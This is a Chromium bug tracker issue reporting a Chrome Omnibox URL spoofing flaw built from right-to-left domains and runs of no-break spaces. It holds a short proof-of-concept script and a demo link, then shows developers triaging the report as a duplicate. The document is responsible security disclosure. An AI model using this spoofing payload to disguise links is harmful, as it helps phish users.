New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 665358 link

Starred by 2 users

Issue metadata

Status: Duplicate
Merged: issue 656417
Owner:
Long OOO (go/where-is-mgiuca)
Closed: Nov 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Chrome RTL+ No-break space URL Spoofing

Reported by xis...@gmail.com, Nov 15 2016

Issue description

VULNERABILITY DETAILS
RTL URLs make IP address to the left side of the Chrome Omnibox.Unicode U+00A0 is no-break space,which will display blank in the Chrome Omnibox. A lot of no-break space will hide the real domain.

VERSION
Chrome Version: [54.0.2840.98] + [stable]
Operating System: [Windows7&10,MAC10.12.1,IOS10.2,Android7.0]

REPRODUCTION CASE

POC:

<script>
function aa(){
    var link = document.createElement('a');
    link.href = 'http://xn--ggbla1c4e.xn--ngbc5azd/?'+Array(0x50).join("%C2%A0")+'127.0.0.1';
    link.target="aaaa";
    document.body.appendChild(link);
    link.click();
}
</script>

<a onclick="aa();" href="javascript:void(0);">CLICK ME</a>

Online Demo:http://xisigr.com/test/spoof/chrome/rtl_1.html
 
chrome_url_rtl_1.PNG
33.6 KB View Download

Comment 1 by mea...@chromium.org, Nov 15 2016

Labels: Team-Security-UX
Owner: mgiuca@chromium.org
Thanks for the report.

mgiuca: Not sure if this is the same as bug 351639, could you please take a look and triage as appropriate? Thanks.
Components: UI>Security>UrlFormatting

Comment 3 by mgiuca@chromium.org, Nov 16 2016

Mergedinto: 656417
Status: Duplicate (was: Unconfirmed)
I think this is most related to  Issue 656417 . It's essentially the same exploit but using NBSPs instead of other weak-direction characters.

I'll dupe this, but be sure to add this to the list of examples.
Project Member

Comment 4 by sheriffbot@chromium.org, Aug 30 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment